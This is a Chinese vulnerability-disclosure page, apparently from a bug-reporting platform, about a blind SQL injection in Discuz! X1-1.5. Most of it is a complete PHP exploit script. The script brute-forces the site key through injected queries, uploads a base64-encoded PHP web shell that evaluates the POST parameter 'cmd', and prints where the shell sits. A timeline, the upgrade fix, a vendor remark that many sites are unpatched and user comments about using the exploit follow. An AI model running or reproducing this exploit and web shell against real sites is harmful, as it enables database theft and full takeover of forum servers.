2011-06-03: 细节已通知厂商并且等待厂商处理中 2011-06-03: 厂商已经确认,细节仅向厂商公开 2011-06-06: 细节向第三方安全合作伙伴开放 2011-07-28: 细节向核心白帽子及相关领域专家公开 2011-08-07: 细节向普通白帽子公开 2011-08-17: 细节向实习白帽子公开 2011-07-03: 细节向公众公开
可以自由写入一句话木马
以下为漏洞的EXP
<?phpprint_r('+---------------------------------------------------------------------------+Discuz! X1-1.5 notify_credit.php Blind SQL injection exploit by toby57 2010.11.05mail: admin at bkey orgteam: http://www.bkey.org说明:alibaba把后续getshell代码添加了下去+---------------------------------------------------------------------------+');if ($argc < 2) { print_r('+---------------------------------------------------------------------------+Usage: php '.$argv[0].' url [pre]Example:php '.$argv[0].' http://localhost/php '.$argv[0].' http://localhost/ xss_+---------------------------------------------------------------------------+'); exit;}error_reporting(7);ini_set('max_execution_time', 0);$url = $argv[1];$pre = $argv[2]?$argv[2]:'pre_';$target = parse_url($url);extract($target);$path1 = $path . '/api/trade/notify_credit.php';$hash = array();$hash = array_merge($hash, range(48, 57));$hash = array_merge($hash, range(97, 102));$tmp_expstr = "'";$res = send();if(strpos($res,'SQL syntax')==false){var_dump($res);die('Oooops.I can NOT hack it.');}preg_match('/FROM\s([a-zA-Z_]+)forum_order/',$res,$match);if($match[1])$pre = $match[1];$tmp_expstr = "' UNION ALL SELECT 0,1,0,0,0,0,0,0,0,0 FROM {$pre}common_setting WHERE ''='";$res = send();if(strpos($res,"doesn't exist")!==false){ echo "Table_pre is WRONG!\nReady to Crack It.Please Waiting..\n"; for($i = 1;$i<20;$i++){ $tmp_expstr = "' UNION ALL SELECT 0,1,0,0,0,0,0,0,0,0 FROM information_schema.columns WHERE table_schema=database() AND table_name LIKE '%forum_post_tableid%' AND LENGTH(REPLACE(table_name,'forum_post_tableid',''))=$i AND ''='"; $res = send(); if(strpos($res,'SQL syntax')!==false){ $pre = ''; $hash2 = array(); $hash2 = array_merge($hash2, range(48, 57)); $hash2 = array_merge($hash2, range(97, 122)); $hash2[] = 95; for($j = 1;$j <= $i; $j++){ for ($k = 0; $k <= 255; $k++) { if(in_array($k, $hash2)) { $char = dechex($k); $tmp_expstr = "' UNION ALL SELECT 0,1,0,0,0,0,0,0,0,0 FROM information_schema.columns WHERE table_schema=database() AND table_name LIKE '%forum_post_tableid%' AND MID(REPLACE(table_name,'forum_post_tableid',''),$j,1)=0x{$char} AND ''='"; $res = send(); if(strpos($res,'SQL syntax')!==false){ echo chr($k); $pre .= chr($k);break; } } } } if(strlen($pre)){echo "\nCracked...Table_Pre:".$pre."\n";break;}else{die('GET Table_pre Failed..');}; } } };echo "Please Waiting....\n";$sitekey = '';for($i = 1;$i <= 32; $i++){ for ($k = 0; $k <= 255; $k++) { if(in_array($k, $hash)) { $char = dechex($k);$tmp_expstr = "' UNION ALL SELECT 0,1,0,0,0,0,0,0,0,0 FROM {$pre}common_setting WHERE skey=0x6D795F736974656B6579 AND MID(svalue,{$i},1)=0x{$char} AND ''='";$res = send();if(strpos($res,'SQL syntax')!==false){ echo chr($k); $sitekey .= chr($k);break;}}}}/*By: alibaba修改与添加了一些代码,如果成功就能得到shell一句话秘密是 : cmd*/if(strlen($sitekey)!=32) { echo "\nmy_sitekey not found. try blank my_sitekey\n";}else echo "\nmy_sitekey:{$sitekey}\n";echo "\nUploading Shell...";$module = 'video';$method = 'authauth';$params = 'a:3:{i:0;i:1;i:1;s:36:"PD9waHAgZXZhbCgkX1BPU1RbY21kXSk7Pz4=";i:2;s:3:"php";}';$sign = md5($module . '|' . $method . '|' . $params . '|' . $sitekey);$data = "module=$module&method=$method¶ms=$params&sign=$sign";$path2 = $path . "/api/manyou/my.php";POST($host,80,$path2,$data,30);echo "\nGetting Shell Location...\n";$file = '';for($i = 1;$i <= 32; $i++){ for ($k = 0; $k <= 255; $k++) { if(in_array($k, $hash)) { $char = dechex($k); $tmp_expstr = "' UNION ALL SELECT 0,1,0,0,0,0,0,0,0,0 FROM {$pre}common_member_field_home WHERE uid=1 AND MID(videophoto,{$i},1)=0x{$char} AND ''='"; $res = send(); if(strpos($res,'SQL syntax')!==false){ echo chr($k); $file .= chr($k);break; } } }}echo "\nShell: $host$path/data/avatar/". substr($file,0,1) . "/" . substr($file,1,1) . "/$file.php";exit;function sign($exp_str){ return md5("attach=tenpay&mch_vno={$exp_str}&retcode=0&key=");}function send(){ global $host, $path1, $tmp_expstr; $expdata = "attach=tenpay&retcode=0&trade_no=%2527&mch_vno=".urlencode(urlencode($tmp_expstr))."&sign=".sign($tmp_expstr); return POST($host,80,$path1,$expdata,30);} function POST($host,$port,$path,$data,$timeout, $cookie='') { $buffer=''; $fp = fsockopen($host,$port,$errno,$errstr,$timeout); if(!$fp) die($host.'/'.$path.' : '.$errstr.$errno); else { fputs($fp, "POST $path HTTP/1.0\r\n"); fputs($fp, "Host: $host\r\n"); fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n"); fputs($fp, "Content-length: ".strlen($data)."\r\n"); fputs($fp, "Connection: close\r\n\r\n"); fputs($fp, $data."\r\n\r\n"); while(!feof($fp)) { $buffer .= fgets($fp,4096); } fclose($fp); } return $buffer;} ?>
升级至Discuz! X2
危害等级:低
漏洞Rank:1
确认时间:2011-06-03 12:28
该漏洞已于3月22提供补丁修复,但由于部分站长仍未补丁,由于此转载为exp全文,为了不必要的误会以及传播,影响到仍旧未补丁的站长或造成其他用户的误会,对此漏洞1分通过,暂不忽略或公开。
暂无
貌似利用不到,能爆出一句话地址,但是打不开呢,好像根本就没传上去 似的
确实很多站都还没有修补
DZ 1.5 getshell原理是什么哪个NB帮我讲解下.
toby57 这个貌似比较早了吧 t00ls当时放出的?
好久前的吧?我的漏洞就不审核 ,外面复制来的就审核了!哎。》!。